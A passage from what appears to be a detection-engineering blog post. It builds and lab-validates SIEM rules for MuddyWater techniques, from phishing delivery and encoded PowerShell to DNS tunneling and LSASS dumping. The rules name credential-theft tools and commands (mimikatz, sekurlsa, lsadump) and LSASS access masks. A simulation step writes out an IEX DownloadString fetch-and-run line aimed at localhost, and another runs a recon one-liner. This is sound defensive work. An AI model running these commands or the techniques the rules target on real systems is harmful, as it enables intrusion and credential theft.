contains:</p><ul><li>The specific MuddyWater behavior it targets (not the ATT&amp;CK technique category)</li><li>Required log sources and capability gates</li><li>Multi-rule pseudologic (SIEM-agnostic — works as a template for Sigma, KQL, SPL, or any rule format)</li><li>False positive classes and tuning guidance</li><li>A creation_logic field explaining <em>why</em> the rule is designed this way — the design decision, not just what the rule does</li></ul><p>Coverage scores follow a strict scale: <strong>5</strong> = lab-validated with a Kibana screenshot. <strong>4</strong> = correlated analytic (good logic, single source or partial lab). <strong>3</strong> = behavioral detection with partial validation. A score of 5 requires a proof, not just passing pseudologic.</p><p><strong>Step 20 — Analyst Review</strong></p><p>Before any detection went to validation, every record went through a review pass that checked: operator precedence in multi-clause conditions, access mask completeness for LSASS detection, path allowlist accuracy for the GoogleUpdate/Goopdate IoC, and ATT&amp;CK technique coverage gaps. The review fixed a real operator precedence bug in det_mw_0010 Rule B where the command_line clause was outside the event_type guard, tightened the LSASS access mask set, improved T1033 coverage in det_mw_0009 Rule C via Win32_ComputerSystem, and added the x86/x64 Google installation path allowlist to det_mw_0004 Rule A.</p><h4>det_mw_0001 — Email Delivery Correlated with Process Spawn</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/796/1*ycAoCbrkdxo6oxx4X0Gkhw.png"></figure><p><em>Techniques: T1566.001, T1566.002 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> MuddyWater delivers malicious content three ways — ZIP or Office macro attachments, links to Egnyte/OneDrive delivering RMM installers, and emails from compromised accounts. Corroborated by CISA AA22–055A, INCD 2023, and INCD 2024. The highest-priority initial access vector in the dataset.</p><p><strong>Why it’s built this way:</strong> Email delivery alone is not a detection signal — MuddyWater’s phishing emails are indistinguishable from legitimate mail at the gateway layer. The detection value comes from correlating delivery with a process spawn on the recipient endpoint within a tight 5-minute window. The parent process constraint (Outlook, browser) is the key limiter: it restricts scope to email-triggered or link-triggered execution, which is exactly the documented delivery chain. Both attachment-based and link-based delivery methods are covered because all variants are source-confirmed. The correlated logic type reflects that neither event alone is sufficient — only the combination is meaningful.</p><p><strong>Required telemetry:</strong> Email gateway or SEG with attachment metadata and URL extraction. EDR or Sysmon Event ID 1 with parent image and command line. Without the gateway telemetry, this detection degrades to parent-process heuristics only and loses the delivery-correlation value.</p><pre>event_type IN [email_delivery] AND<br>  (attachment.extension IN ["zip","xlsx","xlsm","pdf","docm"] OR<br>   link.domain IN ["egnyte.com","onedrive.live.com","1drv.ms"])<br>CORRELATE WITHIN 300 seconds WITH<br>event_type IN [process_create] WHERE<br>  parent_image IN ["OUTLOOK.EXE","chrome.exe","firefox.exe","msedge.exe"] AND<br>  image IN ["powershell.exe","cmd.exe","wscript.exe","mshta.exe",<br>            "AteraAgent.exe","ScreenConnect.exe","SimpleHelp.exe","rport.exe"]</pre><p><strong>Key false positives:</strong> Legitimate macro-enabled Office files from internal users. IT-approved RMM tools deployed via email links during onboarding. Tune by excluding known sender domains and approved RMM deployment windows.</p><h4>det_mw_0002 — Web Service Spawning Interpreter Shell</h4><p><em>Techniques: T1190 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> MuddyWater uses public-facing exploitation as a secondary initial access vector — CVE-2020–0688 (Exchange), CVE-2020–1472 (Netlogon/Zerologon), CVE-2021–44228 (Log4j), and unspecified VPN vulnerabilities from INCD 2024.</p><p><strong>Why it’s built this way:</strong> The detection targets the post-exploitation moment — a web service spawning a shell — rather than the exploit payload itself. This is deliberately CVE-agnostic: it fires on CVE-2020–0688, CVE-2020–1472, Log4j, and any unnamed VPN vulnerability without needing individual exploit signatures. The parent process list maps directly to the documented CVEs: w3wp.exe covers Exchange and IIS, java.exe covers Log4j, lsass.exe covers Netlogon exploitation leading to SYSTEM-level shell creation. The SYSTEM integrity level filter is the key noise reducer — legitimate administrative scripts rarely run at SYSTEM under IIS application pools without a clear documented reason.</p><p><strong>Required telemetry:</strong> EDR or Sysmon Event ID 1 with full parent-child chain and integrity level. IDS/IPS for CVE-specific signatures as a complementary layer.</p><pre>event_type = process_create AND<br>parent_image IN ["w3wp.exe","java.exe","lsass.exe","services.exe",<br>                 "vmtoolsd.exe","vpnagent.exe"] AND<br>image IN ["cmd.exe","powershell.exe","wscript.exe","cscript.exe","bash.exe"] AND<br>(parent_user IN ["NETWORK SERVICE","IIS_IUSRS","SYSTEM"] OR<br> integrity_level = "System")</pre><p><strong>Key false positives:</strong> Legitimate administrative scripts under IIS application pools. Java-based monitoring agents that spawn processes. Tune by process hash allowlisting for known-good management tools.</p><h4>det_mw_0003 — PowerShell Encoded Command and Script Obfuscation</h4><p><em>Techniques: T1059.001, T1027 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> PowerShell obfuscation is a cross-cutting technique present in every MuddyWater tool tier — PowGoop (Base64 C2 setup), POWERSTATS (IEX + web request for stage delivery), and the 2024 lure campaigns (embedded API key executed via PowerShell). Three distinct usage patterns across tools required three rules.</p><p><strong>Why it’s built this way:</strong> Each rule targets a different MuddyWater PowerShell pattern with a different telemetry requirement.</p><p>Rule A targets PowGoop and POWERSTATS loader delivery. The regex \s-e[a-zA-Z]*\s+[A-Za-z0-9+/=]{50,} is deliberately written to match all unambiguous prefix forms of -EncodedCommand (-e, -ec, -en, -enc) while the 50-character minimum for the Base64 blob avoids matching the -Encoding parameter. This is the operator precision that matters: -Encoding UTF8 would otherwise match a naive regex.</p><p>Rule B targets POWERSTATS script execution behavior: IEX combined with a web request. This is the decoded content layer — it requires Script Block Logging (Event ID 4104), which is the capability gate that determines whether this detection class exists at all in a given environment.</p><p>Rule C is the delivery-context fallback: PowerShell spawned by an Office application, email client, or browser has no legitimate explanation in a standard enterprise environment and fires regardless of whether Script Block Logging is enabled.</p><p><strong>Required telemetry:</strong> Script Block Logging (Event ID 4104) — required for Rule B and for the highest-fidelity version of this detection. Sysmon Event ID 1 for Rules A and C. Without Script Block Logging, the detection degrades to command-line heuristics only.</p><pre># Rule A — Encoded command flag (all prefix forms: -e, -ec, -en, -enc ...)<br>event_type = process_create AND<br>image ENDSWITH "powershell.exe" AND<br>command_line IMATCHES "\s-e[a-zA-Z]*\s+[A-Za-z0-9+/=]{50,}"</pre><pre># Rule B — Script Block content (Event ID 4104)<br>event_type = script_block_log AND<br>script_block_text MATCHES "(IEX|Invoke-Expression|InvokeScript)" AND<br>script_block_text MATCHES "(WebClient|Invoke-WebRequest|DownloadString|Net\.Http)"</pre><pre># Rule C — Suspicious parent process<br>event_type = process_create AND<br>image ENDSWITH "powershell.exe" AND<br>parent_image IN ["OUTLOOK.EXE","winword.exe","excel.exe",<br>                 "chrome.exe","firefox.exe","msedge.exe","WScript.exe"]</pre><p><strong>Key false positives:</strong> Administrative scripts using -EncodedCommand for special characters. SCCM/Ansible deployments running Base64-encoded payloads. Baseline known-good encoded commands by hash before alerting on Rule A.</p><h4>det_mw_0004 — Unsigned DLL Loaded by Signed Executable</h4><p><em>Techniques: T1574.002 · Score: 3 (behavioral, partial validation)</em></p><p><strong>What it targets:</strong> PowGoop’s execution method — a malicious DLL renamed Goopdate.dll placed alongside GoogleUpdate.exe, causing the legitimate signed binary to load it. Confirmed in 2024 toolset by INCD 2024.</p><p><strong>Why it’s built this way:</strong> Two rules serve different confidence tiers. Rule A is sourced directly from the documented PowGoop technique: the specific process name (GoogleUpdate.exe), DLL name (Goopdate.dll), and the fact that any path outside the Google installation directories is anomalous. The allowlist covers both x86 and x64 installation paths because omitting either creates a bypass. This combination — specific binary, specific DLL name, path outside expected directory — is near-unique and fires with high precision. Rule B is the generic behavioral net for future DLL side-loading variants where the actor may use different binary names — it trades precision for coverage against toolset evolution.</p><p>Score is 3 (not 5) because the lab’s stub DLL did not produce sufficient Sysmon EID 7 signal during validation. The detection logic is sound; the telemetry dependency (Sysmon image load events with signing status) is the constraint.</p><p><strong>Required telemetry:</strong> Sysmon Event ID 7 (ImageLoad) with signed/unsigned status — this is the hard dependency. Without it, DLL loads are invisible to SIEM-based detection.</p><pre># Rule A — Specific IoC: GoogleUpdate loading Goopdate from non-Google path<br>event_type = image_load AND<br>image ENDSWITH "GoogleUpdate.exe" AND<br>loaded_image ENDSWITH "Goopdate.dll" AND<br>NOT (loaded_image_path STARTSWITH "C:\Program Files (x86)\Google\" OR<br>     loaded_image_path STARTSWITH "C:\Program Files\Google\")</pre><pre># Rule B — Generic: signed process loading unsigned DLL from user-writable path<br>event_type = image_load AND<br>process_signed = true AND<br>loaded_image_signed = false AND<br>loaded_image_path MATCHES "(\\Users\\|\\AppData\\|\\Temp\\|\\ProgramData\\)"</pre><p><strong>Key false positives:</strong> Third-party software shipping unsigned DLLs alongside signed executables (common). Developer workstations with locally compiled DLLs. Rule B requires environment-specific tuning before production deployment.</p><h4>det_mw_0005 — Registry Run Key and Startup Folder Persistence</h4><p><em>Techniques: T1547.001 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> Multiple MuddyWater malware families use Run key persistence with actor-specific value names. Small Sieve: OutlookMicrosift (deliberate typo mimicking Microsoft). AA22-055A documents a second key: SystemTextEncoding. Canopy installs a WSF script in the startup folder — a sub-technique that doesn't appear as a Run key write.</p><p><strong>Why it’s built this way:</strong> Three rules cover three distinct persistence mechanisms across the malware catalog. Rule A is an exact-match IoC alert on the two named value names — it fires immediately on any match without needing path or parent context, because these specific strings have no legitimate usage in a standard enterprise environment. Rule B is the behavioral safety net for unknown or renamed values: path heuristic (AppData/Temp) combined with a non-installer parent covers the common pattern of malware writing its own persistence without using an installer. The process_integrity_level filter removes high-integrity (admin-level) processes from the behavioral rule because legitimate software installers typically run elevated. Rule C is added specifically to cover Canopy's startup folder WSF persistence, which doesn't show up as a Run key write at all — it's a file creation event.</p><p><strong>Required telemetry:</strong> Sysmon Event ID 13 (registry value set) for Rules A and B. Sysmon Event ID 11 (file create) for Rule C.</p><pre># Rule A — Specific IoC: known MuddyWater Run key value names<br>event_type = registry_set AND<br>registry_key MATCHES "\\CurrentVersion\\Run" AND<br>registry_value_name IN ["OutlookMicrosift","SystemTextEncoding"]<br><br><br># Rule B - Behavioral: Run key pointing to writable/unusual path<br>event_type = registry_set AND<br>registry_key MATCHES "(HKCU|HKLM)\\.*\\CurrentVersion\\Run" AND<br>registry_value_data MATCHES "(\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\)" AND<br>process_image NOT IN ["msiexec.exe","setup.exe","install.exe","update.exe"] AND<br>process_integrity_level NOT IN ["High","System"]<br># Rule C - Script files written to startup folder (covers Canopy WSF)<br>event_type = file_create AND<br>file_path MATCHES "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" AND<br>file_extension IN ["wsf","vbs","js","ps1","bat","cmd"]</pre><p><strong>Key false positives:</strong> Rule A has essentially zero false positives on the specific value names. Rule B requires installer process exclusion — the list is environment-specific. Rule C may fire on legitimate startup scripts deployed by IT via Group Policy; exclude by file hash or signer.</p><h4>det_mw_0006 — Scheduled Task with 43-Minute Beacon Interval</h4><p><em>Techniques: T1053.005 · Score: 4 (correlated analytic)</em></p><p><strong>What it targets:</strong> BugSleep creates a Windows scheduled task triggered every 43 minutes for C2 beaconing — a specific behavioral fingerprint documented in the INCD 2024 report. The interval is documented as customizable, but 43 minutes is the observed operational value.</p><p><strong>Why it’s built this way:</strong> The 43-minute interval is the single most precise artifact in the entire procedure dataset. Rule A is designed as a high-fidelity immediate alert requiring no tuning: PT43M is the ISO 8601 duration format for 43 minutes and appears verbatim in the Windows Task XML. This fires with near-zero false positives because no legitimate software uses a 43-minute repeat interval for any standard purpose. Rule B generalizes the pattern for future BugSleep variants that may use a different interval: short repetition (under 60 minutes) combined with a task action pointing to a user-writable path is anomalous regardless of exact interval. Rule C is the telemetry fallback — many environments do not forward Task Scheduler event logs to SIEM, but schtasks.exe process creation (Sysmon EID 1) is more commonly collected and captures the command line.</p><p>Score is 4 (not 5) because this is a single-source procedure — INCD 2024 only. Before treating Rule A as a high-confidence production alert, corroborate with a second vendor source.</p><p><strong>Required telemetry:</strong> Windows Security Event ID 4698 (scheduled task created) or Task Scheduler operational log for Rules A and B. Sysmon Event ID 1 for Rule C.</p><pre># Rule A — Specific: 43-minute interval (BugSleep artifact) — immediate alert<br>event_type = scheduled_task_created AND<br>task_trigger_repetition_interval = "PT43M"<br><br># Rule B - Behavioral: short interval + suspicious action path<br>event_type = scheduled_task_created AND<br>task_trigger_repetition_interval_minutes &lt; 60 AND<br>task_action_path MATCHES "(\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\)" AND<br>creating_process NOT IN ["svchost.exe","taskeng.exe","msiexec.exe"]<br># Rule C - Sysmon command line fallback<br>event_type = process_create AND<br>image ENDSWITH "schtasks.exe" AND<br>command_line MATCHES "/create" AND<br>command_line MATCHES "(AppData|Temp|ProgramData)"</pre><p><strong>Key false positives:</strong> Backup and monitoring software creating frequent tasks. Browser update mechanisms. Rule B requires interval baseline per environment before production deployment.</p><h4>det_mw_0007 — RMM Tool Executed from User-Writable Path</h4><p><em>Techniques: T1219 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> RMM tool abuse is the most consistently documented MuddyWater technique across all source tiers — five independent government and vendor sources corroborate it. Tool inventory across campaigns: ScreenConnect (2022), SyncroRAT (Israel 2023), rport.exe (DarkBit operation), AteraAgent (multiple sources), SimpleHelp, Level, PDQConnect (2024).</p><p><strong>Why it’s built this way:</strong> RMM tool detection is inherently a context problem. The binary is legitimate. The network traffic to vendor infrastructure is legitimate. Only the delivery chain and execution path are anomalous. Three rules address this from different angles.</p><p>Rule A uses path as the primary signal: a legitimately IT-deployed RMM tool installs to Program Files or a managed path, not AppData/Temp/Downloads. A known RMM binary executing from a user-writable path means it was delivered, not installed by IT.</p><p>Rule B uses parent process as the signal: no legitimate RMM deployment is spawned by Outlook, a browser, or an archive utility. This is the delivery-context constraint — if an RMM binary’s parent is OUTLOOK.EXE, the delivery chain is phishing regardless of what the binary is.</p><p>Rule C uses network destination: RMM infrastructure connections from endpoints with no authorized RMM deployment are anomalous. Rules A+C together — RMM binary from writable path plus outbound connection to vendor domain — form the highest-confidence combined signal.</p><p><strong>The baseline prerequisite is non-negotiable.</strong> Rule C without a baseline of authorized RMM deployments per endpoint generates constant noise in any environment that legitimately uses RMM tools. This is the single highest-ROI detection in the dataset if the baseline is clean.</p><p><strong>Required telemetry:</strong> EDR or Sysmon Event ID 1 with parent image and file path. Network flow or proxy logs with process name attribution for Rule C.</p><pre># Rule A — Known RMM binary from non-standard installation path<br>event_type = process_create AND<br>(image ENDSWITH "AteraAgent.exe" OR<br> image ENDSWITH "ScreenConnect.exe" OR<br> image ENDSWITH "SimpleHelp.exe" OR<br> image ENDSWITH "rport.exe" OR<br> image ENDSWITH "SyncroRAT.exe" OR<br> image ENDSWITH "Level.exe" OR<br> image ENDSWITH "PDQConnect.exe") AND<br>image_path MATCHES "(\\AppData\\|\\Temp\\|\\Downloads\\|\\Users\\[^\\]+\\Desktop\\)"<br><br># Rule B - RMM binary spawned by email client or browser<br>event_type = process_create AND<br>(image ENDSWITH "AteraAgent.exe" OR image ENDSWITH "ScreenConnect.exe" OR<br> image ENDSWITH "SimpleHelp.exe" OR image ENDSWITH "rport.exe") AND<br>parent_image IN ["OUTLOOK.EXE","outlook.exe","chrome.exe","firefox.exe",<br>                 "msedge.exe","7zFM.exe","WinRAR.exe","explorer.exe"]<br># Rule C - Outbound connection to RMM vendor infrastructure from unexpected endpoint<br>event_type = network_connection AND<br>destination_domain MATCHES "(atera\.com|screenconnect\.com|simplehelp\.net|syncromsp\.com)" AND<br>source_process NOT IN [known_rmm_processes_baseline]</pre><p><strong>Key false positives:</strong> All RMM tools are legitimate software — the entire detection depends on delivery context and path. Authorized deployments must be baselined per endpoint before any rule produces useful signal. Help desk technicians installing RMM from their downloads folder will match Rule A; exclude by user account or machine type.</p><h4>det_mw_0008a — Non-Browser Process Connecting to Telegram Bot API</h4><p><em>Techniques: T1071.001, T1102 · Score: 3 (behavioral, partially validated)</em></p><p><strong>What it targets:</strong> Small Sieve beacons exclusively via the Telegram Bot API (api.telegram.org) over HTTPS. This is one of the most specific C2 channels documented for MuddyWater — a fixed, known hostname with no CDN rotation.</p><p><strong>Why it’s built this way:</strong> The detection is single-rule because the signal is specific enough not to need graduated fallbacks. api.telegram.org is a fixed hostname. The discriminating condition is not the domain but the process: in enterprise environments where Telegram is not a standard application, any process connecting to this endpoint is anomalous. The approach is deliberately narrow — it will miss if MuddyWater switches from Telegram to another messaging API, but fires with high precision on the documented Small Sieve C2 channel.</p><p>Score is 3 because VirtualBox NAT blocked outbound Telegram connections in the lab, preventing full Kibana validation of the network connection event.</p><p><strong>Required telemetry:</strong> DNS query logs or network flow logs with process name attribution. In environments without process-attributed network telemetry, this degrades to a domain-based alert with no process context.</p><pre>event_type = network_connection AND<br>destination_domain = "api.telegram.org" AND<br>destination_port = 443 AND<br>source_process NOT IN ["Telegram.exe","telegram.exe","chrome.exe",<br>                        "firefox.exe","msedge.exe","iexplore.exe"]</pre><p><strong>Key false positives:</strong> Telegram desktop application where it is approved. Bot developers testing scripts from dev workstations. In organizations where Telegram is standard, strict process allowlisting is required before this detection is useful.</p><h4>det_mw_0008b — DNS Tunneling Volume and Entropy</h4><p><em>Techniques: T1572 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> Mori, MuddyWater’s DNS-tunneling backdoor, uses DNS queries as the C2 channel. DNS tunneling encodes data in subdomain labels, producing distinctive patterns: high query volume to a single domain, unusually long subdomain strings, and high Shannon entropy in the label content.</p><p><strong>Why it’s built this way:</strong> DNS tunneling detection cannot rely on a single heuristic because each heuristic has a different failure mode. Volume (Rule A) catches high-throughput tunneling but misses slow/low-rate tools that deliberately throttle to blend in. Label length (Rule B) catches encoded payloads regardless of rate or entropy but misses short encoded segments. Entropy (Rule C) catches random-looking subdomains at any length and rate but produces noise on CDN hash labels without a comprehensive baseline. The three rules are additive — any single trigger warrants investigation, two or more from the same source are high-confidence.</p><p>The thresholds (&gt;100 queries per 60 seconds, &gt;40-character labels, &gt;3.5 Shannon entropy) were validated in the lab by generating 180 DNS queries with 42-character random subdomains from the simulation playbook.</p><p><strong>Required telemetry:</strong> DNS resolver logs with full QNAME — not available in all environments. If only DNS flow logs (not query content) are available, Rule B and Rule C are unavailable.</p><pre># Rule A — High query volume to single parent domain<br>event_type = dns_query<br>GROUP BY source_ip, query_domain_parent<br>HAVING COUNT(*) &gt; 100 WITHIN 60 seconds<br><br># Rule B - Long subdomain labels (&gt;40 chars indicates encoded payload)<br>event_type = dns_query AND<br>LENGTH(subdomain_label) &gt; 40<br># Rule C - High entropy subdomains (random-looking encoded content)<br>event_type = dns_query AND<br>SHANNON_ENTROPY(subdomain_label) &gt; 3.5 AND<br>subdomain_label NOT IN [known_cdn_domains_baseline]</pre><p><strong>Key false positives:</strong> CDN domains using hash-based subdomains (Akamai, Cloudflare, AWS) — require comprehensive allowlist for Rule C. DNSSEC validation traffic with long encoded keys. Calibrate thresholds against your specific environment’s DNS baseline before deploying Rule A in production.</p><h4>det_mw_0009 — WMI SecurityCenter2 Discovery Survey</h4><p><em>Techniques: T1047, T1082, T1016, T1033, T1518.001 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> CISA AA22–055A reproduces the exact PowerShell survey script MuddyWater uses post-access: a WMI query chain that collects IP addresses (Win32_NetworkAdapterConfiguration), OS name and architecture (Win32_OperatingSystem), hostname, domain, username (Win32_ComputerSystem), and AV product names (root\SecurityCenter2\AntiVirusProduct). The collected data is assembled into a delimited string, encoded, and sent to C2.</p><p><strong>Why it’s built this way:</strong> The detection anchors on SecurityCenter2\AntiVirusProduct because it is the highest-specificity WMI class in the documented survey. The other classes — OS name, IP addresses, hostname — are queried by dozens of legitimate monitoring tools. AntiVirusProduct enumeration has a much smaller legitimate caller population: primarily AV management consoles and endpoint security platforms. This makes it the most reliable low-noise signal from the full survey chain.</p><p>Three rules are layered by telemetry quality. Rule A requires Script Block Logging (highest fidelity, decoded script content visible). Rule B falls back to command-line logging — medium fidelity, only fires if SecurityCenter2 appears in the literal command line, not in a decoded payload. Rule C is the most specific: a multi-class pattern that matches the complete documented survey chain, covering all five ATT&amp;CK techniques in a single event. T1033 coverage was added to Rule C via Win32_ComputerSystem during the analyst review pass — it was missing from the initial draft.</p><p>Rule C matches the CISA-documented script closely enough to be treated as near-exact-match when observed.</p><p><strong>Required telemetry:</strong> Script Block Logging (Event ID 4104) — required for Rules A and C. Sysmon Event ID 1 for Rule B.</p><pre># Rule A — Script Block captures SecurityCenter2 query<br>event_type = script_block_log AND<br>script_block_text MATCHES "SecurityCenter2" AND<br>script_block_text MATCHES "AntiVirusProduct"<br><br># Rule B - Process command line contains SecurityCenter2 (fallback without SBL)<br>event_type = process_create AND<br>image ENDSWITH "powershell.exe" AND<br>command_line MATCHES "SecurityCenter2"<br># Rule C - Full survey pattern: all 5 ATT&amp;CK techniques in one event<br># T1518.001 (AV enum) + T1016 (network config) + T1082 (OS info) + T1033 (username)<br>event_type = script_block_log AND<br>script_block_text MATCHES "SecurityCenter2" AND<br>script_block_text MATCHES "Win32_NetworkAdapterConfiguration" AND<br>script_block_text MATCHES "Win32_OperatingSystem" AND<br>script_block_text MATCHES "(Win32_ComputerSystem|Win32_UserAccount|UserName)"</pre><p><strong>Key false positives:</strong> AV management software and endpoint security platforms querying SecurityCenter2. IT inventory tools (Lansweeper, SCCM hardware inventory). Exclude by process hash or signer rather than by process name, since attackers can rename their scripts.</p><h4>det_mw_0010 — LSASS Memory Access and Credential Tool Execution</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/699/1*J0Q8ExDAG7jBY7duoI35MA.png"></figure><p><em>Techniques: T1003.001, T1003.004, T1003.005 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> MuddyWater performs credential access using three tools documented in CISA AA22–055A: Mimikatz and procdump64.exe against LSASS memory (T1003.001), and LaZagne for LSA secrets (T1003.004) and cached domain credentials (T1003.005).</p><p><strong>Why it’s built this way:</strong> Three independent rules cover the full credential dumping lifecycle, each with a different detection philosophy.</p><p>Rule A is the design priority: a process accessing LSASS memory is the universal pre-condition for any LSASS dump, regardless of tool. Detecting the access event (Sysmon EID 10) rather than the tool name means Rule A fires on Mimikatz, procdump, custom C++ loaders, and any future variant — as long as the access mask is in the covered set. The access masks were sourced from established Mimikatz research (0x1010, 0x1410, 0x1438, 0x143a, 0x1418) and extended with 0x1fffff (PROCESS_ALL_ACCESS, used by custom dumpers) and 0x1f0fff (another all-access variant observed in the field). The exclusion list covers known legitimate callers — AV engines, CSrss, WinInit — without which this rule generates constant noise from endpoint security products.</p><p>Rule B is the name-based backstop. Lower fidelity because it misses renamed tools, but catches actors using stock Mimikatz. The analyst review pass re-bracketed the command_line clause to keep it inside the event_type guard — a real operator precedence bug that would have caused the command-line check to match events outside the process_create filter.</p><p>Rule C catches the dump artifact on disk — a final fallback when process-level events are unavailable. .dmp files in user-writable paths are anomalous outside of Windows Error Reporting, which writes to a fixed known path.</p><p><strong>Required telemetry:</strong> Sysmon Event ID 10 (ProcessAccess) with explicit lsass.exe targeting in the Sysmon configuration — this is not enabled by default. Without it, Rule A does not exist. Sysmon Event ID 1 for Rule B. Sysmon Event ID 11 for Rule C.</p><pre># Rule A — LSASS process access (tool-agnostic, highest confidence)<br>event_type = process_access AND<br>target_image ENDSWITH "lsass.exe" AND<br>granted_access MATCHES "(0x1010|0x1410|0x1438|0x143a|0x1418|0x1fffff|0x1f0fff)" AND<br>source_image NOT IN ["MsMpEng.exe","csrss.exe","wininit.exe","svchost.exe",<br>                     "SecurityHealthService.exe","CylanceSvc.exe","SentinelAgent.exe"]<br><br># Rule B - Known credential tool execution (name-based backstop)<br># command_line clause is bracketed inside event_type guard (bug fix in review)<br>event_type = process_create AND<br>(image IMATCHES "mimikatz\.exe" OR<br> image ENDSWITH "procdump64.exe" OR<br> image IMATCHES "lazagne\.exe" OR<br> command_line IMATCHES "(sekurlsa|lsadump|privilege::debug)")<br># Rule C - Dump file creation in user-writable path (artifact backstop)<br>event_type = file_create AND<br>file_extension = "dmp" AND<br>file_path MATCHES "(\\AppData\\|\\Temp\\|\\Users\\|\\ProgramData\\)"</pre><p><strong>Key false positives:</strong> AV and EDR agents that legitimately access LSASS — exclude by process hash, not name, since names are spoofable. Windows Error Reporting creating .dmp files in %TEMP%\WER — exclude that specific path in Rule C. Legitimate procdump usage by developers for application crash diagnostics — require a separate approved-tools baseline.</p><p><strong>Important environment note:</strong> Credential Guard and PPL (Protected Process Light) prevent LSASS reads on modern, hardened systems. If your environment has these enabled, LSASS dump detection is still valuable as a canary for misconfigured or unpatched endpoints, but confirm protection status before using coverage scores here as a measure of actual protection.</p><h3>Phase 5: Validation Lab</h3><h4>Architecture</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8U-N2gM0mGw6qRI7SG06dw.png"></figure><h4>Deploy in One Command</h4><pre>git clone https://github.com/anpa1200/operation-desert-hydra.git<br>cd operation-desert-hydra<br>cp stack/.env.template stack/.env   # fill in passwords<br>bash start.sh</pre><p>start.sh creates the Docker network, starts all stack services, waits for Elasticsearch, boots the Windows 10 Vagrant VM, provisions it via Ansible (Sysmon + Script Block Logging + Winlogbeat), and runs all 11 simulations.</p><h4>Simulation Design</h4><p>Every simulation is <strong>benign-by-design</strong>:</p><ul><li>No live malware, no real C2, no credential exfiltration</li><li>Simulations write benign files (VBScript with Write-Host payload), run real Windows binaries with harmless arguments, or use .NET to open process handles with minimal access masks</li><li>All .dmp files are deleted immediately after event confirmation</li><li>The VM does not connect to real Telegram infrastructure</li></ul><p>The Ansible playbook (lab/ansible/playbooks/validate.yml) runs each simulation, waits 3 seconds, queries the Windows Event Log with Get-WinEvent -FilterHashtable (time-bounded to the last 60 seconds), and prints PASS / FAIL.</p><h4>Step 21: det_mw_0001 — Spearphishing Delivery Chain</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8bLoGgU_easNlOr4ZndCgg.png"></figure><p><strong>What MuddyWater does:</strong> Delivers a ZIP or Office file via email or Egnyte/OneDrive link. The attachment contains a VBScript or WSF file that spawns a hidden encoded PowerShell loader (PowGoop/POWERSTATS).</p><p><strong>Simulation:</strong> wscript.exe sim_delivery.vbs → powershell.exe -WindowStyle Hidden -NonInteractive -EncodedCommand &lt;Base64&gt;</p><p><strong>KQL proof query:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.ParentImage: *wscript.exe*<br>AND winlog.event_data.Image: *powershell.exe*<br>AND winlog.event_data.CommandLine: *EncodedCommand*</pre><p><strong>Result: PASS</strong> — Sysmon EID 1 captured wscript.exe → powershell.exe -EncodedCommand. Parent-child chain and Base64 command line both visible in Kibana.</p><h4>Step 22: det_mw_0002 — Web Service Shell Spawn</h4><p><strong>What MuddyWater does:</strong> Exploits Exchange (CVE-2020–0688), IIS, or Log4j (CVE-2021–44228) — web-facing service spawns cmd.exe or powershell.exe for post-exploitation recon.</p><p><strong>Simulation:</strong> wscript.exe sim_exploit.vbs → cmd.exe /c whoami &amp; hostname &amp; ipconfig /all</p><p><strong>KQL proof query:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.ParentImage: *wscript.exe*<br>AND winlog.event_data.Image: *cmd.exe*<br>AND winlog.event_data.CommandLine: (*whoami* OR *hostname* OR *ipconfig*)</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*PdbeaS4qAhZO0Abz1vnxlw.png"></figure><p><strong>Result: PASS</strong> — Sysmon EID 1 captured wscript.exe → cmd.exe with recon commands in CommandLine.</p><h4>Step 23: det_mw_0003 — PowerShell Encoded Command</h4><p><strong>What MuddyWater does:</strong> PowGoop uses -EncodedCommand for C2 setup. POWERSTATS uses IEX + (New-Object Net.WebClient).DownloadString(...) for stager execution.</p><p><strong>Rule A simulation:</strong> powershell.exe -NonInteractive -e &lt;Base64(Write-Host "test")&gt;</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.CommandLine: *-e*<br>AND winlog.event_data.CommandLine: *[A-Za-z0-9+/]{40,}*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*t-a6QvN0QQMAwrYTgedLgw.png"></figure><p><strong>Rule A Result: PASS</strong> — 4 events captured. PowerShell with Base64 blob visible in command line.</p><p><strong>Rule B simulation:</strong> IEX ((New-Object Net.WebClient).DownloadString('http://127.0.0.1:19999/...'))</p><p><strong>KQL — Rule B:</strong></p><pre>winlog.event_id: 4104<br>AND winlog.event_data.ScriptBlockText: *IEX*<br>AND winlog.event_data.ScriptBlockText: *DownloadString*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-VDCsOq78LyTENKxOUQjJg.png"></figure><p><strong>Rule B Result: PASS</strong> — 16 EID 4104 events. Script Block Logging decoded the IEX + DownloadString pattern.</p><blockquote><strong><em>Capability gate:</em></strong><em> Script Block Logging (EID 4104) must be explicitly enabled. Without it, Rule B is unavailable and detection degrades to command-line heuristics only.</em></blockquote><h4>Step 24: det_mw_0004 — DLL Side-Loading</h4><p><strong>What MuddyWater does:</strong> PowGoop drops Goopdate.dll alongside a copy of GoogleUpdate.exe outside the legitimate Google installation path. When GoogleUpdate launches, Windows loads the malicious DLL.</p><p><strong>Simulation:</strong> Copy a benign 4-byte MZ stub as goopdate.dll into a test directory alongside a signed binary. Launch the binary.</p><p><strong>Result: PARTIAL</strong> — Sysmon EID 7 (ImageLoad) did not fire. Root cause: a 4-byte MZ stub is not a valid loadable DLL — the Windows loader rejects it before generating an EID 7 event. The Sysmon config and detection rule are correct. <strong>Resolution:</strong> Re-test with a real GoogleUpdate.exe (requires Google Chrome installed on lab VM).</p><h4>Step 25: det_mw_0005 